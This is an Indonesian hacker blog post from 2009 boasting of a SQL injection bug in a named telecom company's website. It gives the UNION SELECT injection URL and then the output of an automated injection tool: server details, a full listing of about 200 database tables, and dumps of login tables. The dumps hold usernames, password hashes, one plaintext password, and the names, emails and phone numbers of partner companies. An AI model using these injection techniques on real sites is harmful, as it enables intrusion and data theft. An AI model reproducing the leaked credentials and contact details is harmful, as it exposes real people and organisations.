Sekilas Blogs Owner
Gw Hanyalah Seorang Newbie Yang Suram dan seorang yang sangat kesepian tanpa pujaan hati, Tapi Lumayan Ganteng. Hard To Your Self and This Life Must Be Soft To You..
more...

bugs found on flexi …

Filed under: bugs SQLI
16 November 2009

http://www.telkomflexi.com/detail_produk.php?id=-130+union+all+select+1,2,group_concat(table_name),4,5,

6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.tables+where

+table_schema=database()–
|————————————————–|
| rsauron@gmail.com                         v1.6   |
|   1/2009      darkMySQLi.py                      |
|     — Multi Purpose MySQL Injection Tool –     |
| Usage: darkMySQLi.py [options]                   |
|                      -h help       darkc0de.com  |
|————————————————–|

[+] URL: http://www.telkomflexi.com/detail_produk.php?id=130
[+] 14:37:55
[+] Evasion: + –
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Attempting To find the number of columns…
[+] Testing: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,
[+] Column Length is: 22
[+] Found null column at column #: 3,8,

[!] SQLi URL: http://www.telkomflexi.com/detail_produk.php?id=130+AND+1=2+UNION+SELECT+1,2,3,4,5,6

,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22–
[!] darkMySQLi URL: http://www.telkomflexi.com/detail_produk.php?id=130+AND+1=2+UNION+SELECT+1,2,darkc0de,

4,5,6,7,darkc0de,9,10,11,12,13,14,15,16,17,18,19,20,21,22–

[-] [14:38:21]
[-] Total URL Requests: 22
[-] Done

|————————————————–|
| rsauron@gmail.com                         v1.6   |
|   1/2009      darkMySQLi.py                      |
|     — Multi Purpose MySQL Injection Tool –     |
| Usage: darkMySQLi.py [options]                   |
|                      -h help       darkc0de.com  |
|————————————————–|

[+] URL: http://www.telkomflexi.com/detail_produk.php?id=130+AND+1=2+UNION+SELECT+1,2,darkc0de,4

,5,6,7,darkc0de,9,10,11,12,13,14,15,16,17,18,19,20,21,22
[+] 14:39:05
[+] Evasion: + –
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: dbflexi
User: dbaflexi@app1
Version: 5.0.45
|————————————————–|
| rsauron@gmail.com                         v1.6   |
|   1/2009      darkMySQLi.py                      |
|     — Multi Purpose MySQL Injection Tool –     |
| Usage: darkMySQLi.py [options]                   |
|                      -h help       darkc0de.com  |
|————————————————–|

[+] URL: http://www.telkomflexi.com/detail_produk.php?id=130+AND+1=2+UNION+SELECT+1,2,darkc0de,

4,5,6,7,darkc0de,9,10,11,12,13,14,15,16,17,18,19,20,21,22
[+] 14:39:24
[+] Evasion: + –
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: dbflexi
User: dbaflexi@app1
Version: 5.0.45
[+] Number of Rows: 8333

[Database]: dbarya
[Table: Columns]

[1]bs_comments: comment_ID,comment_post_ID,comment_author,comment_author_email,

comment_author_url,comment_author_IP,comment_date,comment_date_gmt,

comment_content,comment_karma,comment_approved,comment_agent,comment_type,comment_parent,user_id
[2]bs_links: link_id,link_url,link_name,link_image,link_target,link_category,link_description,link_visible,link_owner,link_rating,

link_updated,link_rel,link_notes,link_rss
[3]bs_options: option_id,blog_id,option_name,option_value,autoload
[4]bs_postmeta: meta_id,post_id,meta_key,meta_value
[5]bs_posts: ID,post_author,post_date,post_date_gmt,post_content,post_title,

post_category,post_excerpt,post_status,comment_status,ping_status,post_password,

post_name,to_ping,pinged,post_modified,

post_modified_gmt,post_content_filtered,post_parent,guid,menu_order,post_type,post_mime_type,comment_count
[6]bs_term_relationships: object_id,term_taxonomy_id
[7]bs_term_taxonomy: term_taxonomy_id,term_id,taxonomy,description,parent,count
[8]bs_terms: term_id,name,slug,term_group
[9]bs_usermeta: umeta_id,user_id,meta_key,meta_value
[10]bs_users: ID,user_login,user_pass,user_nicename,user_email,user_url,

user_registered,user_activation_key,user_status,display_name
[11]ib_comments: comment_ID,comment_post_ID,comment_author,comment_author_email,

comment_author_url,comment_author_IP,comment_date,comment_date_gmt,

comment_content,comment_karma,comment_approved,comment_agent,comment_type,comment_parent,user_id
[12]ib_links: link_id,link_url,link_name,link_image,link_target,link_category,

link_description,link_visible,link_owner,link_rating,link_updated,link_rel,

link_notes,link_rss
[13]ib_options: option_id,blog_id,option_name,option_value,autoload
[14]ib_postmeta: meta_id,post_id,meta_key,meta_value
[15]ib_posts: ID,post_author,post_date,post_date_gmt,post_content,post_title,post_category,post_excerpt,

post_status,comment_status,ping_status,post_password,post_name,to_ping,pinged,post_modified,

post_modified_gmt,post_content_filtered,post_parent,guid,menu_order,post_type,post_mime_type,comment_count
[16]ib_term_relationships: object_id,term_taxonomy_id
[17]ib_term_taxonomy: term_taxonomy_id,term_id,taxonomy,description,parent,count
[18]ib_terms: term_id,name,slug,term_group
[19]ib_usermeta: umeta_id,user_id,meta_key,meta_value
[20]ib_users: ID,user_login,user_pass,user_nicename,user_email,user_url,

user_registered,user_activation_key,user_status,display_name
[21]sa_comments: comment_ID,comment_post_ID,comment_author,comment_author_email,

comment_author_url,comment_author_IP,comment_date,comment_date_gmt,comment_content,

comment_karma,comment_approved,comment_agent,comment_type,comment_parent,user_id
[22]sa_links: link_id,link_url,link_name,link_image,link_target,link_category,

link_description,link_visible,link_owner,link_rating,link_updated,link_rel,

link_notes,link_rss
[23]sa_options: option_id,blog_id,option_name,option_value,autoload
[24]sa_postmeta: meta_id,post_id,meta_key,meta_value
[25]sa_posts: ID,post_author,post_date,post_date_gmt,post_content,post_title,

post_category,post_excerpt,post_status,comment_status,ping_status,

post_password,post_name,to_ping,pinged,post_modified,post_modified_gmt,post_content_filtered,

post_parent,guid,menu_order,post_type,post_mime_type,comment_count
[26]sa_sticky: sticky_post_id,sticky_status
[27]sa_term_relationships: object_id,term_taxonomy_id
[28]sa_term_taxonomy: term_taxonomy_id,term_id,taxonomy,description,parent,count
[29]sa_terms: term_id,name,slug,term_group
[30]sa_usermeta: umeta_id,user_id,meta_key,meta_value
[31]sa_users: ID,user_login,user_pass,user_nicename,user_email,user_url,user_registered,

user_activation_key,user_status,display_name

[Database]: dbfile
[Table: Columns]

[32]category: category,description
[33]cp: id,nama,cp
[34]document: waktu,periode,category,type,nama,deskripsi,ext,filename,size,id,username,ip
[35]download: waktu,filename,id,username,ip
[36]login: username,password,fullname,email,telepon,type,typeid,tanggal
[37]type: type,description

[Database]: dbfland
[Table: Columns]

[38]acakIP_3menit: no,ip,waktu
[39]acak_15menit: no,mdn,waktu
[40]acak_content: no,mdn,no_acak,status,waktu_0,waktu_1
[41]acak_flexitone: no,mdn,no_acak,status,waktu_0,waktu_1
[42]banslist: userid,bansid
[43]bookmarks: bookmarkid,fromuserid,touserid,visible,deleted
[44]bulletins: bulletinid,fromuserid,bulletindate,bulletinsubject,bulletinbody,deleted
[45]cachefriends: userid,start,friends
[46]cachetestimonials: cachetestimonialsid,userid,pendingtestimonials,testimonials,showtestimonials
[47]content_natal: kode,jenis,judul,artis,link,tarif
[48]content_ramadhan: kode,jenis,judul,artis
[49]daftar_lagu: rbtUserId,rbtTitle,rbtSinger
[50]flexisong_tbl: songid,cpid,title,artist,regdate,useflag
[51]friends: friendid,fromuserid,touserid,approved,deleted
[52]friendslist: userid,friendslist
[53]halloffame: userId,userName,userPassword,userFullName,userNickName,

YMId,userEmail,userGender,userReligion,marriageStatusId,userPOB,

userDOB,userAddress,userPostCode,provinceId,userNationality,

workId,skinId,myBannerId,blogBannerId,userDisplayPicture,

userDirName,userPhone,userPhoneGSM,userFlexiPhone,u

serFlexiPhone2,userFlexiPhone3,userActiveStatus,userExperiencePoint,

userLastLoggedIn,userLastActive,userStatus,userForumIsAdmin,userCreatedDate,

userUpdatedDate,userLevel,cityName,userPassportId,interestedin,affiliations,

companies,schools,favoritemusic,favoritebooks,favoritetv,favoritemovies,aboutme,

wanttomeet,viewmyfullprofile,sendmemessages,count1stdegreefriend,count2nddegreefriend,

count3rddegreefriend,countfriendrequest,countfriendrequested,counttestimonial,countpendingtestimonial,

countphoto,maxphoto,userIdType,userIdNum
[54]handset_profile_wap: mdn,http_accept,user_agent,accept_charset,accept_language,

x_wap_profile,profile
[55]invites: inviteid,userid,email,invitedate,invited,deleted
[56]last_login: userId,userName,waktuLogin
[57]log_akses_wap: logID,mdn,page,waktu
[58]messages: messageid,fromuserid,touserid,messagedate,messagesubject,messagebody,

messagefolder,messageread,deleted
[59]messages_log: messageid,fromuserid,touserid,messagedate,messagesubject,messagebody,

messagefolder,messageread,deleted
[60]min_mdn_flexter: mdn,min
[61]photos: photoid,userid,photofull,photolarge,photomedium,photosmall,

photodescription,primaryphoto,deleted
[62]plogger_albums: name,id,description,path,parent_id,thumbnail_id
[63]plogger_collections: name,description,path,id,thumbnail_id
[64]plogger_comments: id,parent_id,author,email,url,date,comment,ip,approved
[65]plogger_config: max_thumbnail_size,max_display_size,thumb_num,admin_username,

admin_password,admin_email,date_format,compression,default_sortby,

default_sortdir,gallery_name,allow_dl,allow_comments,allow_print,truncate,square_thumbs,

feed_num_entries,rss_thumbsize,feed_title,use_mod_rewrite,comments_notify,feed_language
[66]plogger_pictures: path,parent_album,parent_collection,caption,id,date_modified,date_submitted,

EXIF_date_taken,EXIF_camera,EXIF_shutterspeed,EXIF_focallength,EXIF_flash,EXIF_aperture,allow_comments
[67]poc_banned_users: USER,TIME_BANNED,BANNED_FOR
[68]poc_cache: ID,MAX_AGE,CONTENT
[69]poc_channels: NAME,PASSWORD,MESSAGE,MAX_LINE_NUMBER,CUR_LINE_NUMBER,

START,STOP,TYPE,INVITED,ORDER_IDX
[70]poc_guestbook: USER,SENDER,TIME,POST
[71]poc_hits: USER,USERPAGE,LINE,BANN,LOGIN
[72]poc_line_buffer: NAME,LINE_0,LINE_1,LINE_2,LINE_3,LINE_4,LINE_5,LINE_6,LINE_7,LINE_8,LINE_9,

LINE_10,LINE_11,LINE_12,LINE_13,LINE_14,LINE_15,LINE_16,LINE_17,LINE_18,LINE_19,

LINE_20,LINE_21,LINE_22,LINE_23,LINE_24,LINE_25,LINE_26,LINE_27,LINE_28,LINE_29,

LINE_30,LINE_31,LINE_32,LINE_33,LINE_34,LINE_35,LINE_36,LINE_37,LINE_38,LINE_39,LINE_40,LINE_41,LINE_42,LINE_43,LINE_44,LINE_45,LINE_46,LINE_47,LINE_48,LINE_49
[73]poc_mails: SENDER,TIME,RECIPIENT,MAIL,TRASHED_BY_SENDER,TRASHED_BY_RECIPIENT
[74]poc_user_account: USER,PASSWORD,PASSWORD_NEW,CONFIRM_CODE,DISABLED,KICKED
[75]poc_user_data: NICK,USER,NAME,THEME,BIRTHDAY,GENDER,EMAIL,PRIVATE_INVITED,

HIDE_EMAIL,PICTURE_URL,HOMEPAGE_URL,INTERESTS,MOTTO,

ICQ_NUMBER,AIM_NICKNAME,YIM_NICKNAME,COLOR,ONLINE,LAST_CHANNEL,

ADVICE,SCROLLSPEED,FRIENDS,GRADE,REGTIME,LAST_ACTIVE_TIME,ONLINE_TIME,

LINES_PER_DAY,LOGINS_PER_DAY,DAYS_REGISTERED,LAST_HOST,LAST_IP,LAST_

USER_AGENT,LAST_SESSIONID,LAST_REFERER,MISC,TMP_INSTANCE
[76]poc_user_groups: NAME,MEMBER
[77]poc_user_notes: NICKNAME,ABOUT,NOTE
[78]rbtAll: rbtUserId,rbtTitle,rbtSinger
[79]rbtMerdeka: rbtUserId,rbtTitle,rbtSinger
[80]rbtMerdeka2006: rbtUserId,rbtTitle,rbtSinger
[81]rbtPromo: rbtUserId,rbtTitle,rbtSinger
[82]rbtRamadhan: rbtUserId,rbtTitle,rbtSinger
[83]rbtRamadhanFull: rbtUserId,rbtTitle,rbtSinger
[84]rbtTop10: rbtSongId,rbtSongArtist,rbtSongTitle
[85]rbtTop5Week: jumlah,rbtSongId,rbtSongArtist,rbtSongTitle,waktu
[86]rbtTop5WeekAll: jumlah,rbtUserId,rbtSinger,rbtTitle,waktu
[87]rbtTop5WeekAllBank: jumlah,rbtUserId,rbtSinger,rbtTitle,waktu
[88]rbtTop5Weekx: jumlah,rbtSongId,rbtSongArtist,rbtSongTitle,waktu
[89]rbtTopAll: id,jumlah,rbtSongId,rbtSongTitle,rbtSongArtist,waktu,dateCreated
[90]rbt_reg_tbl: dbrid,dbcpid,dbtitle,dbsinger,dbregdate,dbsetcount,dbprice,dbsize,

dbcategory,dbuseflag,dbprelistenfile,dbupdatetime
[91]rbt_top10_tbl: dbfromdate,dbtodate,dbrank1,dbtitle1,dbsinger1,dbrank2,dbtitle2,

dbsinger2,dbrank3,dbtitle3,dbsinger3,dbrank4,dbtitle4,dbsinger4,

dbrank5,dbtitle5,dbsinger5,dbrank6,dbtitle6,dbsinger6,dbrank7,

dbtitle7,dbsinger7,dbrank8,dbtitle8,dbsinger8,dbrank9,dbtitle9,

dbsinger9,dbrank10,dbtitle10,dbsinger10
[92]sms5000FL: userId,userName,userFlexiPhone,rupiah
[93]sms_event: no,keyword,mdn,waktu,pesan
[94]sms_event_history: id,keyword,komentar,MDN,waktu
[95]sms_quiz: no,pertanyaan,pilihana,pilihanb,jawaban
[96]storefront_history: no,Waktu,Flexter_ID,MDN,ContentCode,Tarip,ContentProviderName,

waktu_beda_menit
[97]storefront_history_test: no,Waktu,Flexter_ID,MDN,ContentCode,Tarip,ContentProviderName,

waktu_beda_menit
[98]tbl_avatar_accessories: accessoriesId,accessoriesName,accessoriesExperiencePoint,

accessoriesIsDefault
[99]tbl_avatar_body: bodyId,bodyName,bodyExperiencePoint,bodyIsDefault
[100]tbl_avatar_head: headId,headName,headExperiencePoint,headIsDefault
[101]tbl_banner_footer: bannerFooterId,bannerFooterLinkIsExternalLink,bannerFooterUrlExternalLink,

bannerFooterIsPopup,bannerFooterPopupWidth,bannerFooterPopupHeight,

bannerFooterImage,bannerFooterActiveStatus,bannerFooterStagingStatus,bannerFooterRecordStatus,bannerFooterCreateDate,bannerFooterUpdateDate,bannerFooterMenuId,userId
[102]tbl_banner_right: bannerRightId,bannerRightLinkIsExternalLink,bannerRightUrlExternalLink,bannerRightIsPopup,bannerRightPopupWidth,bannerRightPopupHeight,bannerRightImage,bannerRightOrderValue,bannerRightActiveStatus,bannerRightStagingStatus,bannerRightRecordStatus,bannerRightCreateDate,bannerRightUpdateDate,userId
[103]tbl_blog_banner: blogBannerId,blogBannerName,blogBannerFolderName,blogBannerPreviewFolderName,blogBannerIsDefault
[104]tbl_blog_comment: commentId,blogPostId,posterName,content,insertDate
[105]tbl_blog_comment_test: commentId,blogPostId,posterName,content,insertDate
[106]tbl_blog_post: blogPostId,posterId,title,content,allowComment,postTime,lastUpdate,numViews,numComments,ownerId
[107]tbl_blog_post_test: blogPostId,posterId,title,content,allowComment,postTime,lastUpdate,numViews,numComments,ownerId
[108]tbl_content_site: contentSiteId,contentSiteTitle,contentSiteThumbnail,contentSiteEndDate
[109]tbl_exp_point: expPointId,expPointName,expPointValue
[110]tbl_facility_highlight: facilityHighlightId,facilityHighlightName,facilityHighlightThumb,

facilityHighlightCopyText,facilityHighlightIsExternalLink,facilityHighlightUrlExternalLink,facilityHighlightIsPopup,

facilityHighlightPopupWidth,facilityHighlightPopupHeight,userId,facilityHighlightActiveStatus,facilityHighlightOrderValue,

facilityHighlightCreateDate,facilityHighlightUpdateDate
[111]tbl_flexi_sso: username,userpassword,userfullname,useremail,usergender,userdob,

usercreateddate,mmid
[112]tbl_flexi_user: userId,userName,userPassword,userFullName,userNickName,YMId,userEmail,userGender,userReligion,marriageStatusId,userPOB,userDOB,userAddress,userPostCode,provinceId,userNationality,workId,skinId,myBannerId,blogBannerId,userDisplayPicture,userDirName,userPhone,userPhoneGSM,userFlexiPhone,userFlexiPhone2,userFlexiPhone3,userActiveStatus,userExperiencePoint,userLastLoggedIn,userLastActive,userStatus,userForumIsAdmin,userCreatedDate,userUpdatedDate,userLevel,cityName,userPassportId,interestedin,affiliations,companies,schools,favoritemusic,favoritebooks,favoritetv,favoritemovies,aboutme,wanttomeet,viewmyfullprofile,sendmemessages,count1stdegreefriend,count2nddegreefriend,count3rddegreefriend,countfriendrequest,countfriendrequested,counttestimonial,countpendingtestimonial,countphoto,maxphoto,userIdType,userIdNum
[113]tbl_flexi_user_friend: userId,userName,userNickName,count1stdegreefriend,count2nddegreefriend,count3rddegreefriend,countfriendrequest,countfriendrequested
[114]tbl_flexi_user_friends: userId,count1stdegreefriend,count2nddegreefriend,count3rddegreefriend,countfriendrequest,countfriendrequested
[115]tbl_forum: forumId,forumName,forumTopics,forumPosts,forumLastPosted,forumCreateDate,forumUpdateDate,userId,forumActiveStatus
[116]tbl_forum_detail: forumDetailId,forumId,forumTopicId,forumDetailReplier,forumDetailData,forumDetailCreateDate,forumDetailUpdateDate,userId
[117]tbl_forum_topic: forumTopicId,forumId,forumTopicName,forumTopicReplies,forumTopicPoster,forumTopicViews,forumTopicCreateDate,forumTopicUpdateDate,userId,forumTopicLastPosted,forumTopicActiveStatus,forumTopicSummary
[118]tbl_game: gameId,gameName,gameDescription,gameFolderName,gameFolderPreview,gameAuthor,gameCreateDate,gameUpdateDate
[119]tbl_history_test: test
[120]tbl_hobby: hobbyId,hobbyName
[121]tbl_marriage_status: marriageStatusId,marriageStatusName
[122]tbl_my_banner: myBannerId,myBannerName,myBannerFolderName,myBannerPreviewFolderName,myBannerIsDefault
[123]tbl_province: provinceId,provinceName
[124]tbl_rbt_channel_history: hid,tanggal,ivr,sms,wap,web,webRequest
[125]tbl_rbt_label: labelID,label
[126]tbl_rbt_user: rbtUserId,rbtMDN,rbtPIN,rbtConfirmed,rbtServiceStatus,rbtCreatedDate,rbtUpdatedDate
[127]tbl_redeem_transaction: redeemTransactionId,redeemptionGoodsId,passportId,noTelp,redeemTransactionDate,redeemStatus
[128]tbl_redeemption_goods: redeemptionGoodsId,redeemptionGoodsName,redeemptionGoodsThumbnail,redeemptionGoodsDescription,redeemptionGoodsPoint,redeemptionGoodsQuantity,redeemptionGoodsActiveStatus,redeemptionGoodsCreateDate,redeemptionGoodsUpdateDate
[129]tbl_score: scoreId,gameId,scoreValue,userId,userNickName,scoreCreateDate
[130]tbl_skin: skinId,skinName,skinFolderName,skinPreviewFolderName,skinColorHexa,skinIsDefault
[131]tbl_sms_box: smsBoxId,userId,smsBoxFrom,smsBoxMessage,smsBoxCreateDate
[132]tbl_sms_box_log: smsBoxId,userId,smsBoxFrom,smsBoxMessage,smsBoxCreateDate
[133]tbl_summary_rbt: rbtSongId,rbtSongTitle,rbtSongArtist,rbtSongHit
[134]tbl_summary_user: userId,smsBox,blogView,rbt,messageNew
[135]tbl_temp_plasa: userId,userName,userPassword,userFullName,userNickName,userEmail
[136]tbl_test_forum: forumId,forumName,forumTopics,forumPosts,forumLastPosted,forumCreateDate,forumUpdateDate,userId,forumActiveStatus
[137]tbl_test_forum_detail: forumDetailId,forumId,forumTopicId,forumDetailReplier,forumDetailData,forumDetailCreateDate,forumDetailUpdateDate,userId
[138]tbl_test_forum_topic: forumTopicId,forumId,forumTopicName,forumTopicReplies,forumTopicPoster,forumTopicViews,forumTopicCreateDate,forumTopicUpdateDate,userId,forumTopicLastPosted,forumTopicActiveStatus,forumTopicSummary
[139]tbl_toc: tocId,tocType,tocAliasName,tocCopyText,tocActiveStatus,tocCreateDate,tocUpdateDate
[140]tbl_undian: undianId,undianName,undianDateStart,undianDateEnd,undianPoint,undianPrizeCopyText,undianWinner,undianIsGenerated
[141]tbl_undian_coupon: undianCouponId,passportId,undianCouponNo,undianId,undianCouponCreatedDate
[142]tbl_undian_winner: undianWinnerId,undianCouponId,undianWinnerOrder
[143]tbl_upgrade_level: upgradeId,userId,userPin,userFlexiPhone,createDate
[144]tbl_user: userId,userName,userPassword,userEmail,userActiveStatus,userCreateDate,userUpdateDate
[145]tbl_user2avatar: user2AvatarId,userId,accessoriesId,headId,bodyId
[146]tbl_user_history: userId,loginDate
[147]tbl_user_hobby: userHobbyId,userId,hobbyId
[148]tbl_user_log_fl: logUserId,tanggal,countUser,logUser,countSmsBox,logUpgradeLevel,logBlogPost,logRbtOn
[149]tbl_user_login: userLoginId,dateToLogin,countUserLogin
[150]tbl_user_nickname: userNickNameId,userId,userNickName
[151]tbl_user_plasa: userPlasaId,userId,userPlasa
[152]tbl_user_prop_fl: tupid,tanggal,propinsi,jumlahFlexter,goldFlexter
[153]tbl_user_trendy: userFlexiPhone,userTrendyId,userRegistrationDate
[154]tbl_work: workId,workName
[155]test: user,password
[156]testimonials: testimonialid,fromuserid,touserid,testimonialdate,testimonialmessage,approved,deleted
[157]testimonialsWap: testimonialid,fromuserid,touserid,testimonialdate,testimonialmessage,approved,deleted
[158]user_divre: id,username,password

[Database]: dbflexi
[Table: Columns]

[159]TFCC: no,soal,ja,jb,jc,jd,jawaban,jenis_soal,nama,divre
[160]TFCC_jawaban: No,Nama,Divre,J1,J2,J3,J4,J5,J6,J7,J8,J9,J10,Nilai
[161]content_category: CategoryID,Name
[162]content_coverage: ContentID,CityID,UserUpd,DateUpd
[163]content_images: ContentID,FileName,OrderNumber,UserUpd,DateUpd
[164]content_management: ContentID,ProviderID,ContentDate,ContentCategory,ContentType,ContentTitle,ContentLogo,ContentDescription,ContentMechanisme,ContentTarif,ContentMOPre,ContentMOPost,ContentMTPre,ContentMTPost,ContentCoverage,ContentStatus,DocumentStatus,ContentHighOrder,ContentExpired,UserUpd,DateUpd
[165]content_mgmt: ContentID,ContentMOPre,ContentMOPost,ContentMTPre,ContentMTPost,ContentCoverage,ContentHighOrder,UserUpd,DateUpd
[166]content_type: TypeID,Name
[167]divre_news: NewsID,NewsSourceID,NewsDate,NewsTitle,NewsImages,NewsResume,NewsDetail,NewsStatus,DocumentStatus,NewsExpired,UserUpd,DateUpd
[168]frental: id,nama,alamat,no_identitas,no_telp,tglpinjam,tglkembali,no_trendy,merk,id_handheld,kelengkapan,voucher,deposit,bayar,no_kartu,keterangan
[169]frental_admin: username,password,previlledge,lokasi,keterangan
[170]frental_handheld: id_handheld,merk,kondisi,tglbeli,deposit,status,keterangan
[171]hotPopup: popupId,link,width,height,activeStatus
[172]iklan_data: id,kategori,isi,nomor
[173]iklan_log: id,isi,nomor
[174]link: link_id,nama,link,keterangan,shortcode,user,pass
[175]ms_kota: KotaID,PropinsiID,KotaName,UserUpd,DateUpd
[176]ms_propinsi: PropinsiID,PropinsiName,UserUpd,DateUpd
[177]ms_user: UserID,GroupID,DivreID,ProviderID,VendorID,UserName,UserPassword,UserStatus,UserLevel,ExpiredDate,UserUpd,DateUpd
[178]ms_user_group: GroupID,GroupName,GroupDescription,GroupLevel,UserUpd,DateUpd
[179]ms_vendor: VendorID,VendorName,VendorAddress,VendorCity,VendorZIP,VendorEmail,VendorURL,VendorPhone,VendorFax,VendorDescription,UserUpd,DateUpd
[180]pilkada01_acuan: kota,keyword,jumlah_kandidat,urut_event
[181]pilkada01_kandidat: keyword,urutan,nama_kandidat,cara,gambar
[182]pilkada01_log: id,isi,nomor
[183]pilkada01_petunjuk: keyword,petunjuk,urut_event
[184]pilkada01_sah: id,isi,nomor
[185]pilkada03_log: id,isi,nomor
[186]pilkada04_acuan: kota,keyword,jumlah_kandidat
[187]pilkada04_kandidat: keyword,urutan,nama_kandidat,cara,gambar
[188]pilkada04_log: id,isi,nomor
[189]pilkada04_petunjuk: keyword,petunjuk
[190]pilkada04_sah: id,isi,nomor
[191]pilkada05_acuan: kota,keyword,jumlah_kandidat,urut_event
[192]pilkada05_kandidat: keyword,urutan,nama_kandidat,cara,gambar
[193]pilkada05_log: id,isi,nomor
[194]pilkada05_petunjuk: keyword,petunjuk,urut_event
[195]pilkada05_sah: id,isi,nomor
[196]report: ReportID,Name,Link,ParamName,ParamName2,TableName,FieldTitle,FieldSearch,FieldUpdate,FieldParam,FieldParam2,Category,UserUpd,DateUpd
[197]report_other: ReportID,Name,Title,URL,Updated,UserUpd,DateUpd
[198]report_status: StatusID,Status,UserUpd,DateUpd
[199]report_updated: ReportID,Name,Title,URL,Updated,UserUpd,DateUpd
[200]table_search: TableID,TableName,TableFieldID,TableFieldName,TableDescription,UserUpd,DateUpd
[201]tbl_area_map: areaMapId,areaMapName,areaMapNameEn,areaMapThumbnail,areaMapImage,areaMapParent,userId,areaMapOrderValue,areaMapActiveStatus,areaMapStagingStatus,areaMapRecordStatus,areaMapCreateDate,areaMapUpdateDate
[202]tbl_banner_main: bannerMainId,fileName,startDate,endDate
[203]tbl_banner_right: bannerRightId,pageId,bannerRight2Menu,bannerRightLinkIsExternalLink,bannerRightUrlExternalLink,bannerRightIsPopup,bannerRightPopupWidth,bannerRightPopupHeight,pageParameterValue,bannerRightImage,bannerRightOrderValue,bannerRightActiveStatus,bannerRightStagingStatus,bannerRightRecordStatus,bannerRightCreateDate,bannerRightUpdateDate,bannerRightType,userId
[204]tbl_banner_top: bannerTopId,pageId,bannerTopLinkIsExternalLink,bannerTopUrlExternalLink,bannerTopIsPopup,bannerTopPopupWidth,bannerTopPopupHeight,pageParameterValue,bannerTopImage
|————————————————–|
| rsauron@gmail.com                         v1.6   |
|   1/2009      darkMySQLi.py                      |
|     — Multi Purpose MySQL Injection Tool –     |
| Usage: darkMySQLi.py [options]                   |
|                      -h help       darkc0de.com  |
|————————————————–|

[+] URL: http://www.telkomflexi.com/detail_produk.php?id=130+AND+1=2+UNION+SELECT+1,2,darkc0de,4,5,6,7,darkc0de,9,10,11,12,13,14,15,16,17,18,19,20,21,22
[+] 16:31:00
[+] Evasion: + –
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: dbflexi
User: dbaflexi@app1
Version: 5.0.45
[+] Dumping data from database “dbfland” Table “tbl_user”
[+] Column(s) ['userId', 'userName', 'userPassword']
[+] Number of Rows: 5

[1] 1:admin:21232f297a57a5a743894a0e4a801fc3:
[2] 2:usma:592e97cfba81b71cfaa427148c746275:
[3] 3:cak_usma:42aaef4e4d60e1416259a4959c6190a2:
[4] 5:auto:c72ce1f3ac0e8c1d7e913e1618a58419:
[5] 6:bayu:funkyjunk:

[-] [16:31:14]
[-] Total URL Requests: 7
[-] Done

|————————————————–|
| rsauron@gmail.com                         v1.6   |
|   1/2009      darkMySQLi.py                      |
|     — Multi Purpose MySQL Injection Tool –     |
| Usage: darkMySQLi.py [options]                   |
|                      -h help       darkc0de.com  |
|————————————————–|

[+] URL: http://www.telkomflexi.com/detail_produk.php?id=130+AND+1=2+UNION+SELECT+1,2,darkc0de,4,5,6,7,darkc0de,9,10,11,12,13,14,15,16,17,18,19,20,21,22
[+] 16:35:10
[+] Evasion: + –
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: dbflexi
User: dbaflexi@app1
Version: 5.0.45
[+] Dumping data from database “dbfile” Table “login”
[+] Column(s) ['username', 'password', 'fullname', 'email', 'telepon', 'type', 'typeid', 'tanggal']
[+] Number of Rows: 92

[1] admin:*1686D31215FFFC1449B4B978E8F9A221A89BF84F:admin:admin:021:admin:0:2007-05-30:
[2] user:*1686D31215FFFC1449B4B978E8F9A221A89BF84F:user:-:-:user:0:2007-06-13:
[3] mitsui:*702D3452C246BB2EE71888B67A7D0BABC0C43A13:Hafidz:ca.billing@telkom.co.id:0213447070:admin:0:2007-06-22:
[4] dyan:*C9205079A275E3243B3C5D89A17FF7B52854E115:Dyan:ca.billing@telkom.co.id:0213447070:admin:0:2007-06-22:
[5] MUSICA:*46C2C9E7F48A6F4F7760B93174E68B8A5552FB06:Musica Studio’s:setio@musica-studios.co.id:021 7974985:cp:95:2007-06-27:
[6] STAR:*16840D1BAFB6FAEB91477FF874EEA4C8E2FC390F:Semesta Tirta Antar Raya:endang@indowork.com , eka@indowork.com:021 5667176:cp:53:2007-06-27:
[7] CODE JAWA:*AB0F80E49D9B07D6E14827145C068A190C758225:Code Jawa:arum@codejawa.com:021-7827616:cp:91:2007-06-27:
[8] INFOKOM:*EEBF9CB114076668F3DD36A368560EE3ED38F284:Infokom Elektrindo:bambang.siswanto@infokom.net:021 – 52902828:cp:31:2007-06-27:
[9] BCOMM:*27F80BA6938A07E42867B7670531A0700253A9BC:Benang Komunika Infotama:khairi@benang.co.id , iqbal@benang.co.id:021-7202930:cp:46:2007-06-27:
[10] DEPSOS:*2A55DED7364850FB48FFE89C48CC86B2EE04978A:Departemen Sosial RI:abcd@efgh.go.id:021:cp:142:2007-06-27:
[11] PLASMA:*8A0CDE14758896350FB2A7C4E3484F9433841146:Raba Komunikatama:linda@plasma.co.id , yenti@plasma.co.id , irril@plasma.co.id:021-70338844:cp:13:2007-06-27:
[12] TRIYAKOM:*DF0753B3B32D73FF5CC12A0DDF5A9830F585A921:Trikomsel Yahooh Communication:lisa@triyakom.com:021:cp:21:2007-06-27:
[13] TELKOM IVAS:*20B916F8618BBCA4DF657F712DC2B4C2A70D5229:Telkom IVAS:abcd@telkom.co.id:021:cp:108:2007-06-27:
[14] ELASITAS:*FEC7750D653BEC25936DF465BF853A1A747E28DC:Elasitas Multi Kreasi:martha@elasitas.com:02145874001:cp:12:2007-06-27:
[15] AOP:*514699B1AEE5B468012A8156585A02A6E843B277:AlphaOmega Wahana Nusantara:juliana@alpha-omega.co.id:021:cp:6:2007-06-27:
